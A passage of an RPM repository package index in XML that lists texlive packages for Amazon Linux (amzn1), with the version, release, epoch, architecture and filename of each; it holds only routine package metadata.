arch="noarch"><filename>Packages/texlive-xunicode-svn23897.0.981-45.amzn1.noarch.rpm</filename></package><package name="texlive-parallel-doc" version="svn15878.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-parallel-doc-svn15878.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-ms-doc" version="svn24467.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-ms-doc-svn24467.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-memoir-doc" version="svn21638.3.6j_patch_6.0g" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-memoir-doc-svn21638.3.6j_patch_6.0g-45.amzn1.noarch.rpm</filename></package><package name="texlive-pdfpages-doc" version="svn27574.0.4t" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-pdfpages-doc-svn27574.0.4t-45.amzn1.noarch.rpm</filename></package><package name="texlive-latex-bin" version="svn26689.0" release="45.amzn1" epoch="2" 
arch="noarch"><filename>Packages/texlive-latex-bin-svn26689.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-ms" version="svn24467.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-ms-svn24467.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-xtab-doc" version="svn23347.2.3f" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-xtab-doc-svn23347.2.3f-45.amzn1.noarch.rpm</filename></package><package name="texlive-pspicture-doc" version="svn15878.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-pspicture-doc-svn15878.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-xetex-tibetan-doc" version="svn28847.0.1" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-xetex-tibetan-doc-svn28847.0.1-45.amzn1.noarch.rpm</filename></package><package name="texlive-ncctools" version="svn15878.3.5" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-ncctools-svn15878.3.5-45.amzn1.noarch.rpm</filename></package><package name="texlive-ifetex" version="svn24853.1.2" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-ifetex-svn24853.1.2-45.amzn1.noarch.rpm</filename></package><package name="texlive-xetex-pstricks" version="svn17055.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-xetex-pstricks-svn17055.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-dvipdfmx" version="svn26765.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-dvipdfmx-svn26765.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-texlive.infra-doc" version="svn28217.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-texlive.infra-doc-svn28217.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-varwidth-doc" version="svn24104.0.92" release="45.amzn1" epoch="2" 
arch="noarch"><filename>Packages/texlive-varwidth-doc-svn24104.0.92-45.amzn1.noarch.rpm</filename></package><package name="texlive-l3packages-doc" version="svn29361.SVN_4467" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-l3packages-doc-svn29361.SVN_4467-45.amzn1.noarch.rpm</filename></package><package name="texlive-algorithms-doc" version="svn15878.0.1" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-algorithms-doc-svn15878.0.1-45.amzn1.noarch.rpm</filename></package><package name="texlive-fontbook-doc" version="svn23608.0.2" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-fontbook-doc-svn23608.0.2-45.amzn1.noarch.rpm</filename></package><package name="texlive-footmisc-doc" version="svn23330.5.5b" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-footmisc-doc-svn23330.5.5b-45.amzn1.noarch.rpm</filename></package><package name="texlive-index-doc" version="svn24099.4.1beta" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-index-doc-svn24099.4.1beta-45.amzn1.noarch.rpm</filename></package><package name="texlive-unicode-math-doc" version="svn29413.0.7d" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-unicode-math-doc-svn29413.0.7d-45.amzn1.noarch.rpm</filename></package><package name="texlive-hyphenat" version="svn15878.2.3c" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-hyphenat-svn15878.2.3c-45.amzn1.noarch.rpm</filename></package><package name="texlive-polyglossia-doc" version="svn26163.v1.2.1" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-polyglossia-doc-svn26163.v1.2.1-45.amzn1.noarch.rpm</filename></package><package name="texlive-palatino" version="svn28614.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-palatino-svn28614.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-beton-doc" version="svn15878.0" release="45.amzn1" epoch="2" 
arch="noarch"><filename>Packages/texlive-beton-doc-svn15878.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-beamer" version="svn29349.3.26" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-beamer-svn29349.3.26-45.amzn1.noarch.rpm</filename></package><package name="texlive-pst-tree-doc" version="svn24142.1.12" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-pst-tree-doc-svn24142.1.12-45.amzn1.noarch.rpm</filename></package><package name="texlive-collection-latexrecommended" version="svn25795.0" release="45.20130427_r30134.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-collection-latexrecommended-svn25795.0-45.20130427_r30134.amzn1.noarch.rpm</filename></package><package name="texlive-rotating-doc" version="svn16832.2.16b" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-rotating-doc-svn16832.2.16b-45.amzn1.noarch.rpm</filename></package><package name="texlive-sansmath" version="svn17997.1.1" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-sansmath-svn17997.1.1-45.amzn1.noarch.rpm</filename></package><package name="texlive-pdftex" version="svn29585.1.40.11" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-pdftex-svn29585.1.40.11-45.amzn1.noarch.rpm</filename></package><package name="texlive-showexpl-doc" version="svn27790.v0.3j" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-showexpl-doc-svn27790.v0.3j-45.amzn1.noarch.rpm</filename></package><package name="texlive-tipa" version="svn29349.1.3" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-tipa-svn29349.1.3-45.amzn1.noarch.rpm</filename></package><package name="texlive-changebar" version="svn29349.3.5c" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-changebar-svn29349.3.5c-45.amzn1.noarch.rpm</filename></package><package name="texlive-sepnum" version="svn20186.2.0" release="45.amzn1" epoch="2" 
arch="noarch"><filename>Packages/texlive-sepnum-svn20186.2.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-rcs" version="svn15878.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-rcs-svn15878.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-mh-doc" version="svn29420.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-mh-doc-svn29420.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-cns-doc" version="svn15878.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-cns-doc-svn15878.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-latexconfig" version="svn28991.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-latexconfig-svn28991.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-charter" version="svn15878.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-charter-svn15878.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-titlesec" version="svn24852.2.10.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-titlesec-svn24852.2.10.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-adjustbox" version="svn26555.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-adjustbox-svn26555.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-lua-alt-getopt" version="svn29349.0.7.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-lua-alt-getopt-svn29349.0.7.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-luatex-doc" version="svn26689.0.70.1" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-luatex-doc-svn26689.0.70.1-45.amzn1.noarch.rpm</filename></package><package name="texlive-euler" version="svn17261.2.5" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-euler-svn17261.2.5-45.amzn1.noarch.rpm</filename></package><package 
name="texlive-adjustbox-doc" version="svn26555.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-adjustbox-doc-svn26555.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-thumbpdf-bin" version="svn6898.0" release="45.20130427_r30134.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-thumbpdf-bin-svn6898.0-45.20130427_r30134.amzn1.noarch.rpm</filename></package><package name="texlive-rotating" version="svn16832.2.16b" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-rotating-svn16832.2.16b-45.amzn1.noarch.rpm</filename></package><package name="texlive-metapost-examples-doc" version="svn15878.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-metapost-examples-doc-svn15878.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-float" version="svn15878.1.3d" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-float-svn15878.1.3d-45.amzn1.noarch.rpm</filename></package><package name="texlive-tocloft" version="svn20084.2.3e" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-tocloft-svn20084.2.3e-45.amzn1.noarch.rpm</filename></package><package name="texlive-dvipng-doc" version="svn26689.1.14" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-dvipng-doc-svn26689.1.14-45.amzn1.noarch.rpm</filename></package><package name="texlive-tex4ht-bin" version="svn26509.0" release="45.20130427_r30134.amzn1" epoch="2" arch="x86_64"><filename>Packages/texlive-tex4ht-bin-svn26509.0-45.20130427_r30134.amzn1.x86_64.rpm</filename></package><package name="texlive-thailatex" version="svn29349.0.5.1" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-thailatex-svn29349.0.5.1-45.amzn1.noarch.rpm</filename></package><package name="texlive-latex-doc" version="svn27907.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-latex-doc-svn27907.0-45.amzn1.noarch.rpm</filename></package><package 
name="texlive-filecontents-doc" version="svn24250.1.3" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-filecontents-doc-svn24250.1.3-45.amzn1.noarch.rpm</filename></package><package name="texlive-pst-plot" version="svn28729.1.44" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-pst-plot-svn28729.1.44-45.amzn1.noarch.rpm</filename></package><package name="texlive-ntgclass-doc" version="svn15878.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-ntgclass-doc-svn15878.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-eurosym-doc" version="svn17265.1.4_subrfix" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-eurosym-doc-svn17265.1.4_subrfix-45.amzn1.noarch.rpm</filename></package><package name="texlive-currfile" version="svn29012.0.7b" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-currfile-svn29012.0.7b-45.amzn1.noarch.rpm</filename></package><package name="texlive-mnsymbol" version="svn18651.1.4" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-mnsymbol-svn18651.1.4-45.amzn1.noarch.rpm</filename></package><package name="texlive-pst-grad" version="svn15878.1.06" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-pst-grad-svn15878.1.06-45.amzn1.noarch.rpm</filename></package><package name="texlive-psfrag-doc" version="svn15878.3.04" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-psfrag-doc-svn15878.3.04-45.amzn1.noarch.rpm</filename></package><package name="texlive-enctex" version="svn28602.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-enctex-svn28602.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-fmtcount" version="svn28068.2.02" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-fmtcount-svn28068.2.02-45.amzn1.noarch.rpm</filename></package><package name="texlive-seminar-doc" version="svn18322.1.5" release="45.amzn1" 
epoch="2" arch="noarch"><filename>Packages/texlive-seminar-doc-svn18322.1.5-45.amzn1.noarch.rpm</filename></package><package name="texlive-chngcntr" version="svn17157.1.0a" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-chngcntr-svn17157.1.0a-45.amzn1.noarch.rpm</filename></package><package name="texlive-paralist" version="svn15878.2.3b" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-paralist-svn15878.2.3b-45.amzn1.noarch.rpm</filename></package><package name="texlive-mptopdf-bin" version="svn18674.0" release="45.20130427_r30134.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-mptopdf-bin-svn18674.0-45.20130427_r30134.amzn1.noarch.rpm</filename></package><package name="texlive-collection-basic" version="svn26314.0" release="45.20130427_r30134.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-collection-basic-svn26314.0-45.20130427_r30134.amzn1.noarch.rpm</filename></package><package name="texlive-hyperref" version="svn28213.6.83m" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-hyperref-svn28213.6.83m-45.amzn1.noarch.rpm</filename></package><package name="texlive-geometry" version="svn19716.5.6" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-geometry-svn19716.5.6-45.amzn1.noarch.rpm</filename></package><package name="texlive-mathpazo-doc" version="svn15878.1.003" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-mathpazo-doc-svn15878.1.003-45.amzn1.noarch.rpm</filename></package><package name="texlive-arabxetex-doc" version="svn17470.v1.1.4" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-arabxetex-doc-svn17470.v1.1.4-45.amzn1.noarch.rpm</filename></package><package name="texlive-mfnfss" version="svn19410.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-mfnfss-svn19410.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-lastpage" version="svn28985.1.2l" release="45.amzn1" epoch="2" 
arch="noarch"><filename>Packages/texlive-lastpage-svn28985.1.2l-45.amzn1.noarch.rpm</filename></package><package name="texlive-mflogo-doc" version="svn17487.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-mflogo-doc-svn17487.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-epstopdf" version="svn26577.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-epstopdf-svn26577.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-xetex-pstricks-doc" version="svn17055.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-xetex-pstricks-doc-svn17055.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-colortbl" version="svn25394.v1.0a" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-colortbl-svn25394.v1.0a-45.amzn1.noarch.rpm</filename></package><package name="texlive-tex-gyre-doc" version="svn18651.2.004" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-tex-gyre-doc-svn18651.2.004-45.amzn1.noarch.rpm</filename></package><package name="texlive-avantgar" version="svn28614.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-avantgar-svn28614.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-xetexconfig" version="svn28819.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-xetexconfig-svn28819.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-tocloft-doc" version="svn20084.2.3e" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-tocloft-doc-svn20084.2.3e-45.amzn1.noarch.rpm</filename></package><package name="texlive-graphics-doc" version="svn25405.1.0o" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-graphics-doc-svn25405.1.0o-45.amzn1.noarch.rpm</filename></package><package name="texlive-cite" version="svn19955.5.3" release="45.amzn1" epoch="2" 
arch="noarch"><filename>Packages/texlive-cite-svn19955.5.3-45.amzn1.noarch.rpm</filename></package><package name="texlive-misc" version="svn24955.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-misc-svn24955.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-kerkis-doc" version="svn15878.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-kerkis-doc-svn15878.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-chngcntr-doc" version="svn17157.1.0a" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-chngcntr-doc-svn17157.1.0a-45.amzn1.noarch.rpm</filename></package><package name="texlive-xetex" version="svn26330.0.9997.5" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-xetex-svn26330.0.9997.5-45.amzn1.noarch.rpm</filename></package><package name="texlive-amscls-doc" version="svn29207.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-amscls-doc-svn29207.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-plain" version="svn26647.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-plain-svn26647.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-xetex-itrans-doc" version="svn24105.4.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-xetex-itrans-doc-svn24105.4.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-ncntrsbk" version="svn28614.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-ncntrsbk-svn28614.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-tex-gyre-math" version="svn29045.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-tex-gyre-math-svn29045.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-xltxtra-doc" version="svn19809.0.5e" release="45.amzn1" epoch="2" 
arch="noarch"><filename>Packages/texlive-xltxtra-doc-svn19809.0.5e-45.amzn1.noarch.rpm</filename></package><package name="texlive-metalogo-doc" version="svn18611.0.12" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-metalogo-doc-svn18611.0.12-45.amzn1.noarch.rpm</filename></package><package name="texlive-epstopdf-doc" version="svn26577.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-epstopdf-doc-svn26577.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-amsfonts" version="svn29208.3.04" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-amsfonts-svn29208.3.04-45.amzn1.noarch.rpm</filename></package><package name="texlive-ifoddpage" version="svn23979.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-ifoddpage-svn23979.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-pxfonts-doc" version="svn15878.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-pxfonts-doc-svn15878.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-bera-doc" version="svn20031.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-bera-doc-svn20031.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-microtype-doc" version="svn29392.2.5" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-microtype-doc-svn29392.2.5-45.amzn1.noarch.rpm</filename></package><package name="texlive-filehook-doc" version="svn24280.0.5d" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-filehook-doc-svn24280.0.5d-45.amzn1.noarch.rpm</filename></package><package name="texlive-thailatex-doc" version="svn29349.0.5.1" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-thailatex-doc-svn29349.0.5.1-45.amzn1.noarch.rpm</filename></package><package name="texlive-multirow" version="svn17256.1.6" release="45.amzn1" epoch="2" 
arch="noarch"><filename>Packages/texlive-multirow-svn17256.1.6-45.amzn1.noarch.rpm</filename></package><package name="texlive-collection-latex" version="svn25030.0" release="45.20130427_r30134.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-collection-latex-svn25030.0-45.20130427_r30134.amzn1.noarch.rpm</filename></package><package name="texlive-latex-fonts-doc" version="svn28888.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-latex-fonts-doc-svn28888.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-xecjk" version="svn28816.3.1.2" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-xecjk-svn28816.3.1.2-45.amzn1.noarch.rpm</filename></package><package name="texlive-seminar" version="svn18322.1.5" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-seminar-svn18322.1.5-45.amzn1.noarch.rpm</filename></package><package name="texlive-xetex-tibetan" version="svn28847.0.1" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-xetex-tibetan-svn28847.0.1-45.amzn1.noarch.rpm</filename></package><package name="texlive-pspicture" version="svn15878.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-pspicture-svn15878.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-pst-plot-doc" version="svn28729.1.44" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-pst-plot-doc-svn28729.1.44-45.amzn1.noarch.rpm</filename></package><package name="texlive-footmisc" version="svn23330.5.5b" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-footmisc-svn23330.5.5b-45.amzn1.noarch.rpm</filename></package><package name="texlive-kpathsea-doc" version="svn28792.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-kpathsea-doc-svn28792.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-beamer-doc" version="svn29349.3.26" release="45.amzn1" epoch="2" 
arch="noarch"><filename>Packages/texlive-beamer-doc-svn29349.3.26-45.amzn1.noarch.rpm</filename></package><package name="texlive-kpathsea-lib-devel" version="2012" release="45.20130427_r30134.amzn1" epoch="2" arch="x86_64"><filename>Packages/texlive-kpathsea-lib-devel-2012-45.20130427_r30134.amzn1.x86_64.rpm</filename></package><package name="texlive-xetex-doc" version="svn26330.0.9997.5" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-xetex-doc-svn26330.0.9997.5-45.amzn1.noarch.rpm</filename></package><package name="texlive-hyph-utf8-doc" version="svn29641.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-hyph-utf8-doc-svn29641.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-stmaryrd-doc" version="svn22027.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-stmaryrd-doc-svn22027.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-ucharclasses" version="svn27820.2.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-ucharclasses-svn27820.2.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-texconfig" version="svn29349.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-texconfig-svn29349.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-bidi" version="svn29650.12.2" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-bidi-svn29650.12.2-45.amzn1.noarch.rpm</filename></package><package name="texlive-datetime-doc" version="svn19834.2.58" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-datetime-doc-svn19834.2.58-45.amzn1.noarch.rpm</filename></package><package name="texlive-bera" version="svn20031.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-bera-svn20031.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-ptext-doc" version="svn28124.1" release="45.amzn1" epoch="2" 
arch="noarch"><filename>Packages/texlive-ptext-doc-svn28124.1-45.amzn1.noarch.rpm</filename></package><package name="texlive-crop" version="svn15878.1.5" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-crop-svn15878.1.5-45.amzn1.noarch.rpm</filename></package><package name="texlive-fancyref-doc" version="svn15878.0.9c" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-fancyref-doc-svn15878.0.9c-45.amzn1.noarch.rpm</filename></package><package name="texlive-etoolbox" version="svn20922.2.1" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-etoolbox-svn20922.2.1-45.amzn1.noarch.rpm</filename></package><package name="texlive-ifoddpage-doc" version="svn23979.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-ifoddpage-doc-svn23979.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-rsfs" version="svn15878.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-rsfs-svn15878.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-epsf" version="svn21461.2.7.4" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-epsf-svn21461.2.7.4-45.amzn1.noarch.rpm</filename></package><package name="texlive-pstricks" version="svn29678.2.39" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-pstricks-svn29678.2.39-45.amzn1.noarch.rpm</filename></package><package name="texlive-ifxetex-doc" version="svn19685.0.5" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-ifxetex-doc-svn19685.0.5-45.amzn1.noarch.rpm</filename></package><package name="texlive-amsmath" version="svn29327.2.14" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-amsmath-svn29327.2.14-45.amzn1.noarch.rpm</filename></package><package name="texlive-fontwrap" version="svn15878.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-fontwrap-svn15878.0-45.amzn1.noarch.rpm</filename></package><package 
name="texlive-xetex-itrans" version="svn24105.4.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-xetex-itrans-svn24105.4.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-pst-tree" version="svn24142.1.12" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-pst-tree-svn24142.1.12-45.amzn1.noarch.rpm</filename></package><package name="texlive-xepersian-doc" version="svn29661.12.1" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-xepersian-doc-svn29661.12.1-45.amzn1.noarch.rpm</filename></package><package name="texlive-lm-doc" version="svn28119.2.004" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-lm-doc-svn28119.2.004-45.amzn1.noarch.rpm</filename></package><package name="texlive-qstest-doc" version="svn15878.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-qstest-doc-svn15878.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-collection-xetex" version="svn29634.0" release="45.20130427_r30134.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-collection-xetex-svn29634.0-45.20130427_r30134.amzn1.noarch.rpm</filename></package><package name="texlive-extsizes-doc" version="svn17263.1.4a" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-extsizes-doc-svn17263.1.4a-45.amzn1.noarch.rpm</filename></package><package name="texlive-pdftex-def" version="svn22653.0.06d" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-pdftex-def-svn22653.0.06d-45.amzn1.noarch.rpm</filename></package><package name="texlive-pstricks-add" version="svn28750.3.59" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-pstricks-add-svn28750.3.59-45.amzn1.noarch.rpm</filename></package><package name="texlive-ec" version="svn25033.1.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-ec-svn25033.1.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-pst-eps-doc" 
version="svn15878.1.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-pst-eps-doc-svn15878.1.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-glyphlist" version="svn28576.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-glyphlist-svn28576.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-realscripts-doc" version="svn29423.0.3b" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-realscripts-doc-svn29423.0.3b-45.amzn1.noarch.rpm</filename></package><package name="texlive-wrapfig-doc" version="svn22048.3.6" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-wrapfig-doc-svn22048.3.6-45.amzn1.noarch.rpm</filename></package><package name="texlive-currfile-doc" version="svn29012.0.7b" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-currfile-doc-svn29012.0.7b-45.amzn1.noarch.rpm</filename></package><package name="texlive-dvips" version="svn29585.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-dvips-svn29585.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-hyphenat-doc" version="svn15878.2.3c" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-hyphenat-doc-svn15878.2.3c-45.amzn1.noarch.rpm</filename></package><package name="texlive-fancyref" version="svn15878.0.9c" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-fancyref-svn15878.0.9c-45.amzn1.noarch.rpm</filename></package><package name="texlive-zapfding" version="svn28614.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-zapfding-svn28614.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-debuginfo" version="2012" release="45.20130427_r30134.amzn1" epoch="2" arch="x86_64"><filename>Packages/texlive-debuginfo-2012-45.20130427_r30134.amzn1.x86_64.rpm</filename></package><package name="texlive-listings-doc" version="svn15878.1.4" release="45.amzn1" epoch="2" 
